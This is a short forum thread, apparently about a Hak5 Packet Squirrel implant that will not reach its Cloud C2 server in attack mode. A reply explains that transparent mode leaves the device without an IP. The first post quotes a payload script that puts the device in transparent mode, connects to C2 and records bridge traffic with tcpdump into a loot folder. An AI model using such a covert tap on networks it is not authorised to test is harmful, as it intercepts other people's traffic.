Jump to content

Trying to get PS to connect to C2 in Attack Mode


Recommended Posts

Hi

I've installed C2 on my LAN and got a PS to connect to it whilst in Arming Mode.  Is it possible to get the PS to connect to C2 whilst in attack mode?  I've added C2CONNECT to the payload.sh file under the switch1 directory:

function run() {
        # Create loot directory
        mkdir -p /mnt/loot/tcpdump &> /dev/null

        # Set networking to TRANSPARENT mode and wait five seconds
        NETMODE TRANSPARENT
        sleep 5

        C2CONNECT
        sleep 5

        # Start tcpdump on the bridge interface
        tcpdump -i br-lan -w /mnt/loot/tcpdump/dump_$(date +%Y-%m-%d-%H%M%S).pcap &>/dev/null &
        tpid=$!

 

....but the PS is not connecting to C2.

Can anyone help?

Many thanks in advance.

Regards

Phil

Link to post
Share on other sites
  • 2 months later...

Hello, have you succedded in connecting on C2 while in attack mode ?

I tried to, but it seems not to be able to be TRANSPARENT, and connected to C2 at the same time...

EDIT: it cannot work in transparent mode, as PS doesnt have an IP in this mode. It works in BRIDGE mode

 

Edited by alphax30
Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...